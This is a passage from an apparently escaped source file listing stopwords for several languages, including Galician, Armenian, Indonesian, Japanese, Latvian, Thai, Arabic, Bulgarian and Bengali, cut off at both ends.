\"ná\",\n        \"ní\",\n        \"níor\",\n        \"nó\",\n        \"nócha\",\n        \"ocht\",\n        \"ochtar\",\n        \"os\",\n        \"roimh\",\n        \"sa\",\n        \"seacht\",\n        \"seachtar\",\n        \"seachtó\",\n        \"seasca\",\n        \"seisear\",\n        \"siad\",\n        \"sibh\",\n        \"sinn\",\n        \"sna\",\n        \"sé\",\n        \"sí\",\n        \"tar\",\n        \"thar\",\n        \"thú\",\n        \"triúr\",\n        \"trí\",\n        \"trína\",\n        \"trínár\",\n        \"tríocha\",\n        \"tú\",\n        \"um\",\n        \"ár\",\n        \"é\",\n        \"éis\",\n        \"í\",\n        \"ó\",\n        \"ón\",\n        \"óna\",\n        \"ónár\",\n    ],\n    \"gl\": [\n        \"a\",\n        \"alí\",\n        \"ao\",\n        \"aos\",\n        \"aquel\",\n        \"aquela\",\n        \"aquelas\",\n        \"aqueles\",\n        \"aquilo\",\n        \"aquí\",\n        \"as\",\n        \"así\",\n        \"aínda\",\n        \"ben\",\n        \"cando\",\n        \"che\",\n        \"co\",\n        \"coa\",\n        \"coas\",\n        \"comigo\",\n        \"con\",\n        \"connosco\",\n        \"contigo\",\n        \"convosco\",\n        \"cos\",\n        \"cun\",\n        \"cunha\",\n        \"cunhas\",\n        \"cuns\",\n        \"da\",\n        \"dalgunha\",\n        \"dalgunhas\",\n        \"dalgún\",\n        \"dalgúns\",\n        \"das\",\n        \"de\",\n        \"del\",\n        \"dela\",\n        \"delas\",\n        \"deles\",\n        \"desde\",\n        \"deste\",\n        \"do\",\n        \"dos\",\n        \"dun\",\n        \"dunha\",\n        \"dunhas\",\n        \"duns\",\n        \"e\",\n        \"el\",\n        \"ela\",\n        \"elas\",\n        \"eles\",\n        \"en\",\n        \"era\",\n        \"eran\",\n        \"esa\",\n        \"esas\",\n        \"ese\",\n        \"eses\",\n        \"esta\",\n        \"estaba\",\n        \"estar\",\n        \"este\",\n        \"estes\",\n        \"estiven\",\n        \"estou\",\n        \"está\",\n        \"están\",\n        \"eu\",\n        \"facer\",\n        \"foi\",\n        \"foron\",\n        \"fun\",\n        \"había\",\n        \"hai\",\n        \"iso\",\n        \"isto\",\n        \"la\",\n        \"las\",\n        \"lle\",\n        \"lles\",\n        \"lo\",\n        \"los\",\n        \"mais\",\n        \"me\",\n        \"meu\",\n        \"meus\",\n        \"min\",\n        \"miña\",\n        \"miñas\",\n        \"moi\",\n        \"na\",\n        \"nas\",\n        \"neste\",\n        \"nin\",\n        \"no\",\n        \"non\",\n        \"nos\",\n        \"nosa\",\n        \"nosas\",\n        \"noso\",\n        \"nosos\",\n        \"nun\",\n        \"nunha\",\n        \"nunhas\",\n        \"nuns\",\n        \"nós\",\n        \"o\",\n        \"os\",\n        \"ou\",\n        \"para\",\n        \"pero\",\n        \"pode\",\n        \"pois\",\n        \"pola\",\n        \"polas\",\n        \"polo\",\n        \"polos\",\n        \"por\",\n        \"que\",\n        \"se\",\n        \"senón\",\n        \"ser\",\n        \"seu\",\n        \"seus\",\n        \"sexa\",\n        \"sido\",\n        \"sobre\",\n        \"súa\",\n        \"súas\",\n        \"tamén\",\n        \"tan\",\n        \"te\",\n        \"ten\",\n        \"ter\",\n        \"teu\",\n        \"teus\",\n        \"teñen\",\n        \"teño\",\n        \"ti\",\n        \"tido\",\n        \"tiven\",\n        \"tiña\",\n        \"túa\",\n        \"túas\",\n        \"un\",\n        \"unha\",\n        \"unhas\",\n        \"uns\",\n        \"vos\",\n        \"vosa\",\n        \"vosas\",\n        \"voso\",\n        \"vosos\",\n        \"vós\",\n        \"á\",\n        \"é\",\n        \"ó\",\n        \"ós\",\n    ],\n    \"hy\": [\n        \"այդ\",\n        \"այլ\",\n        \"այն\",\n        \"այս\",\n        \"դու\",\n        \"դուք\",\n        \"եմ\",\n        \"են\",\n        \"ենք\",\n        \"ես\",\n        \"եք\",\n        \"է\",\n        \"էի\",\n        \"էին\",\n        \"էինք\",\n        \"էիր\",\n        \"էիք\",\n        \"էր\",\n        \"ըստ\",\n        \"թ\",\n        \"ի\",\n        \"ին\",\n        \"իսկ\",\n        \"իր\",\n        \"կամ\",\n        \"համար\",\n        \"հետ\",\n        \"հետո\",\n        \"մենք\",\n        \"մեջ\",\n        \"մի\",\n        \"ն\",\n        \"նա\",\n        \"նաև\",\n        \"նրա\",\n        \"նրանք\",\n        \"որ\",\n        \"որը\",\n        \"որոնք\",\n        \"որպես\",\n        \"ու\",\n        \"ում\",\n        \"պիտի\",\n        \"վրա\",\n        \"և\",\n    ],\n    \"id\": [\n        \"ada\",\n        \"adalah\",\n        \"adanya\",\n        \"adapun\",\n        \"agak\",\n        \"agaknya\",\n        \"agar\",\n        \"akan\",\n        \"akankah\",\n        \"akhirnya\",\n        \"aku\",\n        \"akulah\",\n        \"amat\",\n        \"amatlah\",\n        \"anda\",\n        \"andalah\",\n        \"antar\",\n        \"antara\",\n        \"antaranya\",\n        \"apa\",\n        \"apaan\",\n        \"apabila\",\n        \"apakah\",\n        \"apalagi\",\n        \"apatah\",\n        \"atau\",\n        \"ataukah\",\n        \"ataupun\",\n        \"bagai\",\n        \"bagaikan\",\n        \"bagaimana\",\n        \"bagaimanakah\",\n        \"bagaimanapun\",\n        \"bagi\",\n        \"bahkan\",\n        \"bahwa\",\n        \"bahwasanya\",\n        \"banyak\",\n        \"beberapa\",\n        \"begini\",\n        \"beginian\",\n        \"beginikah\",\n        \"beginilah\",\n        \"begitu\",\n        \"begitukah\",\n        \"begitulah\",\n        \"begitupun\",\n        \"belum\",\n        \"belumlah\",\n        \"berapa\",\n        \"berapakah\",\n        \"berapalah\",\n        \"berapapun\",\n        \"bermacam\",\n        \"bersama\",\n        \"betulkah\",\n        \"biasa\",\n        \"biasanya\",\n        \"bila\",\n        \"bilakah\",\n        \"bisa\",\n        \"bisakah\",\n        \"boleh\",\n        \"bolehkah\",\n        \"bolehlah\",\n        \"buat\",\n        \"bukan\",\n        \"bukankah\",\n        \"bukanlah\",\n        \"bukannya\",\n        \"cuma\",\n        \"dahulu\",\n        \"dalam\",\n        \"dan\",\n        \"dapat\",\n        \"dari\",\n        \"daripada\",\n        \"dekat\",\n        \"demi\",\n        \"demikian\",\n        \"demikianlah\",\n        \"dengan\",\n        \"depan\",\n        \"di\",\n        \"dia\",\n        \"dialah\",\n        \"diantara\",\n        \"diantaranya\",\n        \"dikarenakan\",\n        \"dini\",\n        \"diri\",\n        \"dirinya\",\n        \"disini\",\n        \"disinilah\",\n        \"dong\",\n        \"dulu\",\n        \"enggak\",\n        \"enggaknya\",\n        \"entah\",\n        \"entahlah\",\n        \"hal\",\n        \"hampir\",\n        \"hanya\",\n        \"hanyalah\",\n        \"harus\",\n        \"haruslah\",\n        \"harusnya\",\n        \"hendak\",\n        \"hendaklah\",\n        \"hendaknya\",\n        \"hingga\",\n        \"ia\",\n        \"ialah\",\n        \"ibarat\",\n        \"ingin\",\n        \"inginkah\",\n        \"inginkan\",\n        \"ini\",\n        \"inikah\",\n        \"inilah\",\n        \"itu\",\n        \"itukah\",\n        \"itulah\",\n        \"jangan\",\n        \"jangankan\",\n        \"janganlah\",\n        \"jika\",\n        \"jikalau\",\n        \"juga\",\n        \"justru\",\n        \"kala\",\n        \"kalau\",\n        \"kalaulah\",\n        \"kalaupun\",\n        \"kalian\",\n        \"kami\",\n        \"kamilah\",\n        \"kamu\",\n        \"kamulah\",\n        \"kan\",\n        \"kapan\",\n        \"kapankah\",\n        \"kapanpun\",\n        \"karena\",\n        \"karenanya\",\n        \"ke\",\n        \"kecil\",\n        \"kemudian\",\n        \"kenapa\",\n        \"kepada\",\n        \"kepadanya\",\n        \"ketika\",\n        \"khususnya\",\n        \"kini\",\n        \"kinilah\",\n        \"kiranya\",\n        \"kita\",\n        \"kitalah\",\n        \"kok\",\n        \"lagi\",\n        \"lagian\",\n        \"lah\",\n        \"lain\",\n        \"lainnya\",\n        \"lalu\",\n        \"lama\",\n        \"lamanya\",\n        \"lebih\",\n        \"macam\",\n        \"maka\",\n        \"makanya\",\n        \"makin\",\n        \"malah\",\n        \"malahan\",\n        \"mampu\",\n        \"mampukah\",\n        \"mana\",\n        \"manakala\",\n        \"manalagi\",\n        \"masih\",\n        \"masihkah\",\n        \"masing\",\n        \"mau\",\n        \"maupun\",\n        \"melainkan\",\n        \"melalui\",\n        \"memang\",\n        \"mengapa\",\n        \"mereka\",\n        \"merekalah\",\n        \"merupakan\",\n        \"meski\",\n        \"meskipun\",\n        \"mungkin\",\n        \"mungkinkah\",\n        \"nah\",\n        \"namun\",\n        \"nanti\",\n        \"nantinya\",\n        \"nyaris\",\n        \"oleh\",\n        \"olehnya\",\n        \"pada\",\n        \"padahal\",\n        \"padanya\",\n        \"paling\",\n        \"pantas\",\n        \"para\",\n        \"pasti\",\n        \"pastilah\",\n        \"per\",\n        \"percuma\",\n        \"pernah\",\n        \"pula\",\n        \"pun\",\n        \"rupanya\",\n        \"saat\",\n        \"saatnya\",\n        \"saja\",\n        \"sajalah\",\n        \"saling\",\n        \"sama\",\n        \"sambil\",\n        \"sampai\",\n        \"sana\",\n        \"sangat\",\n        \"sangatlah\",\n        \"saya\",\n        \"sayalah\",\n        \"se\",\n        \"sebab\",\n        \"sebabnya\",\n        \"sebagai\",\n        \"sebagaimana\",\n        \"sebagainya\",\n        \"sebaliknya\",\n        \"sebanyak\",\n        \"sebegini\",\n        \"sebegitu\",\n        \"sebelum\",\n        \"sebelumnya\",\n        \"sebenarnya\",\n        \"seberapa\",\n        \"sebetulnya\",\n        \"sebisanya\",\n        \"sebuah\",\n        \"sedang\",\n        \"sedangkan\",\n        \"sedemikian\",\n        \"sedikit\",\n        \"sedikitnya\",\n        \"segala\",\n        \"segalanya\",\n        \"segera\",\n        \"seharusnya\",\n        \"sehingga\",\n        \"sejak\",\n        \"sejenak\",\n        \"sekali\",\n        \"sekalian\",\n        \"sekaligus\",\n        \"sekalipun\",\n        \"sekarang\",\n        \"seketika\",\n        \"sekiranya\",\n        \"sekitar\",\n        \"sekitarnya\",\n        \"sela\",\n        \"selagi\",\n        \"selain\",\n        \"selaku\",\n        \"selalu\",\n        \"selama\",\n        \"selamanya\",\n        \"seluruh\",\n        \"seluruhnya\",\n        \"semacam\",\n        \"semakin\",\n        \"semasih\",\n        \"semaunya\",\n        \"sementara\",\n        \"sempat\",\n        \"semua\",\n        \"semuanya\",\n        \"semula\",\n        \"sendiri\",\n        \"sendirinya\",\n        \"seolah\",\n        \"seorang\",\n        \"sepanjang\",\n        \"sepantasnya\",\n        \"sepantasnyalah\",\n        \"seperti\",\n        \"sepertinya\",\n        \"sering\",\n        \"seringnya\",\n        \"serta\",\n        \"serupa\",\n        \"sesaat\",\n        \"sesama\",\n        \"sesegera\",\n        \"sesekali\",\n        \"seseorang\",\n        \"sesuatu\",\n        \"sesuatunya\",\n        \"sesudah\",\n        \"sesudahnya\",\n        \"setelah\",\n        \"seterusnya\",\n        \"setiap\",\n        \"setidaknya\",\n        \"sewaktu\",\n        \"siapa\",\n        \"siapakah\",\n        \"siapapun\",\n        \"sini\",\n        \"sinilah\",\n        \"suatu\",\n        \"sudah\",\n        \"sudahkah\",\n        \"sudahlah\",\n        \"supaya\",\n        \"tadi\",\n        \"tadinya\",\n        \"tak\",\n        \"tanpa\",\n        \"tapi\",\n        \"telah\",\n        \"tentang\",\n        \"tentu\",\n        \"tentulah\",\n        \"tentunya\",\n        \"terdiri\",\n        \"terhadap\",\n        \"terhadapnya\",\n        \"terlalu\",\n        \"terlebih\",\n        \"tersebut\",\n        \"tersebutlah\",\n        \"tertentu\",\n        \"tetapi\",\n        \"tiap\",\n        \"tidak\",\n        \"tidakkah\",\n        \"tidaklah\",\n        \"toh\",\n        \"waduh\",\n        \"wah\",\n        \"wahai\",\n        \"walau\",\n        \"walaupun\",\n        \"wong\",\n        \"yaitu\",\n        \"yakni\",\n        \"yang\",\n    ],\n    \"ja\": [\n        \"あっ\",\n        \"あり\",\n        \"ある\",\n        \"い\",\n        \"いう\",\n        \"いる\",\n        \"う\",\n        \"うち\",\n        \"お\",\n        \"および\",\n        \"おり\",\n        \"か\",\n        \"かつて\",\n        \"から\",\n        \"が\",\n        \"き\",\n        \"ここ\",\n        \"こと\",\n        \"この\",\n        \"これ\",\n        \"これら\",\n        \"さ\",\n        \"さらに\",\n        \"し\",\n        \"しかし\",\n        \"する\",\n        \"ず\",\n        \"せ\",\n        \"せる\",\n        \"そして\",\n        \"その\",\n        \"その他\",\n        \"その後\",\n        \"それ\",\n        \"それぞれ\",\n        \"た\",\n        \"ただし\",\n        \"たち\",\n        \"ため\",\n        \"たり\",\n        \"だ\",\n        \"だっ\",\n        \"つ\",\n        \"て\",\n        \"で\",\n        \"でき\",\n        \"できる\",\n        \"です\",\n        \"では\",\n        \"でも\",\n        \"と\",\n        \"という\",\n        \"といった\",\n        \"とき\",\n        \"ところ\",\n        \"として\",\n        \"とともに\",\n        \"とも\",\n        \"と共に\",\n        \"な\",\n        \"ない\",\n        \"なお\",\n        \"なかっ\",\n        \"ながら\",\n        \"なく\",\n        \"なっ\",\n        \"など\",\n        \"なら\",\n        \"なり\",\n        \"なる\",\n        \"に\",\n        \"において\",\n        \"における\",\n        \"について\",\n        \"にて\",\n        \"によって\",\n        \"により\",\n        \"による\",\n        \"に対して\",\n        \"に対する\",\n        \"に関する\",\n        \"の\",\n        \"ので\",\n        \"のみ\",\n        \"は\",\n        \"ば\",\n        \"へ\",\n        \"ほか\",\n        \"ほとんど\",\n        \"ほど\",\n        \"ます\",\n        \"また\",\n        \"または\",\n        \"まで\",\n        \"も\",\n        \"もの\",\n        \"ものの\",\n        \"や\",\n        \"よう\",\n        \"より\",\n        \"ら\",\n        \"られ\",\n        \"られる\",\n        \"れ\",\n        \"れる\",\n        \"を\",\n        \"ん\",\n        \"及び\",\n        \"特に\",\n    ],\n    \"lv\": [\n        \"aiz\",\n        \"ap\",\n        \"apakš\",\n        \"apakšpus\",\n        \"ar\",\n        \"arī\",\n        \"augšpus\",\n        \"bet\",\n        \"bez\",\n        \"bija\",\n        \"biji\",\n        \"biju\",\n        \"bijām\",\n        \"bijāt\",\n        \"būs\",\n        \"būsi\",\n        \"būsiet\",\n        \"būsim\",\n        \"būt\",\n        \"būšu\",\n        \"caur\",\n        \"diemžēl\",\n        \"diezin\",\n        \"droši\",\n        \"dēļ\",\n        \"esam\",\n        \"esat\",\n        \"esi\",\n        \"esmu\",\n        \"gan\",\n        \"gar\",\n        \"iekam\",\n        \"iekams\",\n        \"iekām\",\n        \"iekāms\",\n        \"iekš\",\n        \"iekšpus\",\n        \"ik\",\n        \"ir\",\n        \"it\",\n        \"itin\",\n        \"iz\",\n        \"ja\",\n        \"jau\",\n        \"jeb\",\n        \"jebšu\",\n        \"jel\",\n        \"jo\",\n        \"jā\",\n        \"ka\",\n        \"kamēr\",\n        \"kaut\",\n        \"kolīdz\",\n        \"kopš\",\n        \"kā\",\n        \"kļuva\",\n        \"kļuvi\",\n        \"kļuvu\",\n        \"kļuvām\",\n        \"kļuvāt\",\n        \"kļūs\",\n        \"kļūsi\",\n        \"kļūsiet\",\n        \"kļūsim\",\n        \"kļūst\",\n        \"kļūstam\",\n        \"kļūstat\",\n        \"kļūsti\",\n        \"kļūstu\",\n        \"kļūt\",\n        \"kļūšu\",\n        \"labad\",\n        \"lai\",\n        \"lejpus\",\n        \"līdz\",\n        \"līdzko\",\n        \"ne\",\n        \"nebūt\",\n        \"nedz\",\n        \"nekā\",\n        \"nevis\",\n        \"nezin\",\n        \"no\",\n        \"nu\",\n        \"nē\",\n        \"otrpus\",\n        \"pa\",\n        \"par\",\n        \"pat\",\n        \"pie\",\n        \"pirms\",\n        \"pret\",\n        \"priekš\",\n        \"pār\",\n        \"pēc\",\n        \"starp\",\n        \"tad\",\n        \"tak\",\n        \"tapi\",\n        \"taps\",\n        \"tapsi\",\n        \"tapsiet\",\n        \"tapsim\",\n        \"tapt\",\n        \"tapāt\",\n        \"tapšu\",\n        \"taču\",\n        \"te\",\n        \"tiec\",\n        \"tiek\",\n        \"tiekam\",\n        \"tiekat\",\n        \"tieku\",\n        \"tik\",\n        \"tika\",\n        \"tikai\",\n        \"tiki\",\n        \"tikko\",\n        \"tiklab\",\n        \"tiklīdz\",\n        \"tiks\",\n        \"tiksiet\",\n        \"tiksim\",\n        \"tikt\",\n        \"tiku\",\n        \"tikvien\",\n        \"tikām\",\n        \"tikāt\",\n        \"tikšu\",\n        \"tomēr\",\n        \"topat\",\n        \"turpretim\",\n        \"turpretī\",\n        \"tā\",\n        \"tādēļ\",\n        \"tālab\",\n        \"tāpēc\",\n        \"un\",\n        \"uz\",\n        \"vai\",\n        \"var\",\n        \"varat\",\n        \"varēja\",\n        \"varēji\",\n        \"varēju\",\n        \"varējām\",\n        \"varējāt\",\n        \"varēs\",\n        \"varēsi\",\n        \"varēsiet\",\n        \"varēsim\",\n        \"varēt\",\n        \"varēšu\",\n        \"vien\",\n        \"virs\",\n        \"virspus\",\n        \"vis\",\n        \"viņpus\",\n        \"zem\",\n        \"ārpus\",\n        \"šaipus\",\n    ],\n    \"th\": [\n        \"กล่าว\",\n        \"กว่า\",\n        \"กัน\",\n        \"กับ\",\n        \"การ\",\n        \"ก็\",\n        \"ก่อน\",\n        \"ขณะ\",\n        \"ขอ\",\n        \"ของ\",\n        \"ขึ้น\",\n        \"คง\",\n        \"ครั้ง\",\n        \"ความ\",\n        \"คือ\",\n        \"จะ\",\n        \"จัด\",\n        \"จาก\",\n        \"จึง\",\n        \"ช่วง\",\n        \"ซึ่ง\",\n        \"ดัง\",\n        \"ด้วย\",\n        \"ด้าน\",\n        \"ตั้ง\",\n        \"ตั้งแต่\",\n        \"ตาม\",\n        \"ต่อ\",\n        \"ต่าง\",\n        \"ต่างๆ\",\n        \"ต้อง\",\n        \"ถึง\",\n        \"ถูก\",\n        \"ถ้า\",\n        \"ทั้ง\",\n        \"ทั้งนี้\",\n        \"ทาง\",\n        \"ที่\",\n        \"ที่สุด\",\n        \"ทุก\",\n        \"ทํา\",\n        \"ทําให้\",\n        \"นอกจาก\",\n        \"นัก\",\n        \"นั้น\",\n        \"นี้\",\n        \"น่า\",\n        \"นํา\",\n        \"บาง\",\n        \"ผล\",\n        \"ผ่าน\",\n        \"พบ\",\n        \"พร้อม\",\n        \"มา\",\n        \"มาก\",\n        \"มี\",\n        \"ยัง\",\n        \"รวม\",\n        \"ระหว่าง\",\n        \"รับ\",\n        \"ราย\",\n        \"ร่วม\",\n        \"ลง\",\n        \"วัน\",\n        \"ว่า\",\n        \"สุด\",\n        \"ส่ง\",\n        \"ส่วน\",\n        \"สําหรับ\",\n        \"หนึ่ง\",\n        \"หรือ\",\n        \"หลัง\",\n        \"หลังจาก\",\n        \"หลาย\",\n        \"หาก\",\n        \"อยาก\",\n        \"อยู่\",\n        \"อย่าง\",\n        \"ออก\",\n        \"อะไร\",\n        \"อาจ\",\n        \"อีก\",\n        \"เขา\",\n        \"เข้า\",\n        \"เคย\",\n        \"เฉพาะ\",\n        \"เช่น\",\n        \"เดียว\",\n        \"เดียวกัน\",\n        \"เนื่องจาก\",\n        \"เปิด\",\n        \"เปิดเผย\",\n        \"เป็น\",\n        \"เป็นการ\",\n        \"เพราะ\",\n        \"เพื่อ\",\n        \"เมื่อ\",\n        \"เรา\",\n        \"เริ่ม\",\n        \"เลย\",\n        \"เห็น\",\n        \"เอง\",\n        \"แต่\",\n        \"แบบ\",\n        \"แรก\",\n        \"และ\",\n        \"แล้ว\",\n        \"แห่ง\",\n        \"โดย\",\n        \"ใน\",\n        \"ให้\",\n        \"ได้\",\n        \"ไป\",\n        \"ไม่\",\n        \"ไว้\",\n    ],\n    \"ar\": [\n        \"،\",\n        \"أ\",\n        \"ا\",\n        \"اثر\",\n        \"اجل\",\n        \"احد\",\n        \"اخرى\",\n        \"اذا\",\n        \"اربعة\",\n        \"اطار\",\n        \"اعادة\",\n        \"اعلنت\",\n        \"اف\",\n        \"اكثر\",\n        \"اكد\",\n        \"الا\",\n        \"الاخيرة\",\n        \"الان\",\n        \"الاول\",\n        \"الاولى\",\n        \"التى\",\n        \"التي\",\n        \"الثاني\",\n        \"الثانية\",\n        \"الذاتي\",\n        \"الذى\",\n        \"الذي\",\n        \"الذين\",\n        \"السابق\",\n        \"الف\",\n        \"الماضي\",\n        \"المقبل\",\n        \"الوقت\",\n        \"الى\",\n        \"اليوم\",\n        \"اما\",\n        \"امام\",\n        \"امس\",\n        \"ان\",\n        \"انه\",\n        \"انها\",\n        \"او\",\n        \"اول\",\n        \"اي\",\n        \"ايار\",\n        \"ايام\",\n        \"ايضا\",\n        \"ب\",\n        \"باسم\",\n        \"بان\",\n        \"برس\",\n        \"بسبب\",\n        \"بشكل\",\n        \"بعد\",\n        \"بعض\",\n        \"بن\",\n        \"به\",\n        \"بها\",\n        \"بين\",\n        \"تم\",\n        \"ثلاثة\",\n        \"ثم\",\n        \"جميع\",\n        \"حاليا\",\n        \"حتى\",\n        \"حوالى\",\n        \"حول\",\n        \"حيث\",\n        \"حين\",\n        \"خلال\",\n        \"دون\",\n        \"ذلك\",\n        \"زيارة\",\n        \"سنة\",\n        \"سنوات\",\n        \"شخصا\",\n        \"صباح\",\n        \"صفر\",\n        \"ضد\",\n        \"ضمن\",\n        \"عام\",\n        \"عاما\",\n        \"عدة\",\n        \"عدد\",\n        \"عدم\",\n        \"عشر\",\n        \"عشرة\",\n        \"على\",\n        \"عليه\",\n        \"عليها\",\n        \"عن\",\n        \"عند\",\n        \"عندما\",\n        \"غدا\",\n        \"غير\",\n        \"ـ\",\n        \"ف\",\n        \"فان\",\n        \"فى\",\n        \"في\",\n        \"فيه\",\n        \"فيها\",\n        \"قال\",\n        \"قبل\",\n        \"قد\",\n        \"قوة\",\n        \"كان\",\n        \"كانت\",\n        \"كل\",\n        \"كلم\",\n        \"كما\",\n        \"لا\",\n        \"لدى\",\n        \"لقاء\",\n        \"لكن\",\n        \"للامم\",\n        \"لم\",\n        \"لن\",\n        \"له\",\n        \"لها\",\n        \"لوكالة\",\n        \"ما\",\n        \"مايو\",\n        \"مساء\",\n        \"مع\",\n        \"مقابل\",\n        \"مليار\",\n        \"مليون\",\n        \"من\",\n        \"منذ\",\n        \"منها\",\n        \"نحو\",\n        \"نفسه\",\n        \"نهاية\",\n        \"هذا\",\n        \"هذه\",\n        \"هناك\",\n        \"هو\",\n        \"هي\",\n        \"و\",\n        \"و6\",\n        \"واحد\",\n        \"واضاف\",\n        \"واضافت\",\n        \"واكد\",\n        \"وان\",\n        \"واوضح\",\n        \"وفي\",\n        \"وقال\",\n        \"وقالت\",\n        \"وقد\",\n        \"وقف\",\n        \"وكان\",\n        \"وكانت\",\n        \"ولا\",\n        \"ولم\",\n        \"ومن\",\n        \"وهو\",\n        \"وهي\",\n        \"يكون\",\n        \"يمكن\",\n        \"يوم\",\n    ],\n    \"bg\": [\n        \"а\",\n        \"автентичен\",\n        \"аз\",\n        \"ако\",\n        \"ала\",\n        \"бе\",\n        \"без\",\n        \"беше\",\n        \"би\",\n        \"бивш\",\n        \"бивша\",\n        \"бившо\",\n        \"бил\",\n        \"била\",\n        \"били\",\n        \"било\",\n        \"благодаря\",\n        \"близо\",\n        \"бъдат\",\n        \"бъде\",\n        \"бяха\",\n        \"в\",\n        \"вас\",\n        \"ваш\",\n        \"ваша\",\n        \"вероятно\",\n        \"вече\",\n        \"взема\",\n        \"ви\",\n        \"вие\",\n        \"винаги\",\n        \"внимава\",\n        \"време\",\n        \"все\",\n        \"всеки\",\n        \"всички\",\n        \"всичко\",\n        \"всяка\",\n        \"във\",\n        \"въпреки\",\n        \"върху\",\n        \"г\",\n        \"ги\",\n        \"главен\",\n        \"главна\",\n        \"главно\",\n        \"глас\",\n        \"го\",\n        \"година\",\n        \"години\",\n        \"годишен\",\n        \"д\",\n        \"да\",\n        \"дали\",\n        \"два\",\n        \"двама\",\n        \"двамата\",\n        \"две\",\n        \"двете\",\n        \"ден\",\n        \"днес\",\n        \"дни\",\n        \"до\",\n        \"добра\",\n        \"добре\",\n        \"добро\",\n        \"добър\",\n        \"докато\",\n        \"докога\",\n        \"дори\",\n        \"досега\",\n        \"доста\",\n        \"друг\",\n        \"друга\",\n        \"други\",\n        \"е\",\n        \"евтин\",\n        \"едва\",\n        \"един\",\n        \"една\",\n        \"еднаква\",\n        \"еднакви\",\n        \"еднакъв\",\n        \"едно\",\n        \"екип\",\n        \"ето\",\n        \"живот\",\n        \"за\",\n        \"забавям\",\n        \"зад\",\n        \"заедно\",\n        \"заради\",\n        \"засега\",\n        \"заспал\",\n        \"затова\",\n        \"защо\",\n        \"защото\",\n        \"и\",\n        \"из\",\n        \"или\",\n        \"им\",\n        \"има\",\n        \"имат\",\n        \"иска\",\n        \"й\",\n        \"каза\",\n        \"как\",\n        \"каква\",\n        \"какво\",\n        \"както\",\n        \"какъв\",\n        \"като\",\n        \"кога\",\n        \"когато\",\n        \"което\",\n        \"които\",\n        \"кой\",\n        \"който\",\n        \"колко\",\n        \"която\",\n        \"къде\",\n        \"където\",\n        \"към\",\n        \"лесен\",\n        \"лесно\",\n        \"ли\",\n        \"лош\",\n        \"м\",\n        \"май\",\n        \"малко\",\n        \"ме\",\n        \"между\",\n        \"мек\",\n        \"мен\",\n        \"месец\",\n        \"ми\",\n        \"много\",\n        \"мнозина\",\n        \"мога\",\n        \"могат\",\n        \"може\",\n        \"мокър\",\n        \"моля\",\n        \"момента\",\n        \"му\",\n        \"н\",\n        \"на\",\n        \"над\",\n        \"назад\",\n        \"най\",\n        \"направи\",\n        \"напред\",\n        \"например\",\n        \"нас\",\n        \"не\",\n        \"него\",\n        \"нещо\",\n        \"нея\",\n        \"ни\",\n        \"ние\",\n        \"никой\",\n        \"нито\",\n        \"нищо\",\n        \"но\",\n        \"нов\",\n        \"нова\",\n        \"нови\",\n        \"новина\",\n        \"някои\",\n        \"някой\",\n        \"няколко\",\n        \"няма\",\n        \"обаче\",\n        \"около\",\n        \"освен\",\n        \"особено\",\n        \"от\",\n        \"отгоре\",\n        \"отново\",\n        \"още\",\n        \"пак\",\n        \"по\",\n        \"повече\",\n        \"повечето\",\n        \"под\",\n        \"поне\",\n        \"поради\",\n        \"после\",\n        \"почти\",\n        \"прави\",\n        \"пред\",\n        \"преди\",\n        \"през\",\n        \"при\",\n        \"пък\",\n        \"първата\",\n        \"първи\",\n        \"първо\",\n        \"пъти\",\n        \"равен\",\n        \"равна\",\n        \"с\",\n        \"са\",\n        \"сам\",\n        \"само\",\n        \"се\",\n        \"сега\",\n        \"си\",\n        \"син\",\n        \"скоро\",\n        \"след\",\n        \"следващ\",\n        \"сме\",\n        \"смях\",\n        \"според\",\n        \"сред\",\n        \"срещу\",\n        \"сте\",\n        \"съм\",\n        \"със\",\n        \"също\",\n        \"т\",\n        \"т.н.\",\n        \"тази\",\n        \"така\",\n        \"такива\",\n        \"такъв\",\n        \"там\",\n        \"твой\",\n        \"те\",\n        \"тези\",\n        \"ти\",\n        \"то\",\n        \"това\",\n        \"тогава\",\n        \"този\",\n        \"той\",\n        \"толкова\",\n        \"точно\",\n        \"три\",\n        \"трябва\",\n        \"тук\",\n        \"тъй\",\n        \"тя\",\n        \"тях\",\n        \"у\",\n        \"утре\",\n        \"харесва\",\n        \"хиляди\",\n        \"ч\",\n        \"часа\",\n        \"че\",\n        \"често\",\n        \"чрез\",\n        \"ще\",\n        \"щом\",\n        \"юмрук\",\n        \"я\",\n        \"як\",\n    ],\n    \"bn\": [\n        \"অনেক\",\n        \"অন্য\",\n        \"অবশ্য\",\n        \"আগে\",\n        \"আছে\",\n        \"আজ\",\n        \"আবার\",\n        \"আমরা\",\n        \"আমাদের\",\n        \"আর\",\n        \"ই\",\n        \"উত্তর\",\n        \"উপর\",\n        \"উপরে\",\n        \"এ\",\n        \"এই\",\n        \"এক্\",\n        \"এখন\",\n        \"এত\",\n        \"এব\",\n        \"এমন\",\n        \"এমনি\",\n        \"এর\",\n        \"এস\",\n        \"এসে\",\n        \"ও\",\n        \"ওই\",\n        \"কমনে\",\n        \"করা\",\n        \"করে\",\n        \"কাছে\",\n        \"কাজ\",\n        \"কাজে\",\n        \"কারণ\",\n        \"কি\",\n        \"কিছু\",\n        \"কে\",\n        \"কেউ\",\n        \"কেখা\",\n        \"কেন\",\n        \"কোটি\",\n        \"কোনো\",\n        \"কয়েক\",\n        \"খুব\",\n        \"গিয়ে\",\n        \"গেল\",\n        \"চার\",\n        \"চালু\",\n        \"চেষ্টা\",\n        \"ছিল\",\n        \"জানা\",\n        \"জ্নজন\",\n        \"টি\",\n        \"তখন\",\n        \"তবে\",\n        \"তা\",\n        \"তাই\",\n        \"তো\",\n        \"থাকা\",\n        \"থেকে\",\n        \"দিন\",\n        \"দু\",\n        \"দুই\",\n        \"দেওয়া\",\n        \"ধামার\",\n        \"নতুন\",\n        \"না\",\n        \"নাগাদ\",\n        \"নিয়ে\",\n        \"নেওয়া\",\n        \"নয়\",\n        \"পর\",\n        \"পরে\",\n        \"পাচ\",\n        \"পি\",\n        \"পেয়্র্\",\n        \"প্রতি\",\n        \"প্রথম\",\n        \"প্রযন্ত\",\n        \"প্রাথমিক\",\n        \"প্রায়\",\n        \"বক্তব্য\",\n        \"বন\",\n        \"বলা\",\n        \"বলে\",\n        \"বলেন\",\n        \"বহু\",\n        \"বা\",\n        \"বি\",\n        \"বিভিন্ন\",\n        \"বেশ\",\n        \"বেশি\",\n        \"মতো\",\n        \"মধ্যে\",\n        \"মনে\",\n        \"যখন\",\n        \"যদি\",\n        \"যা\",\n        \"যাওয়া\",\n        \"যে\",\n        \"র\",\n        \"রকম\",\n        \"লক্ষ\",\n        \"শুধু\",\n        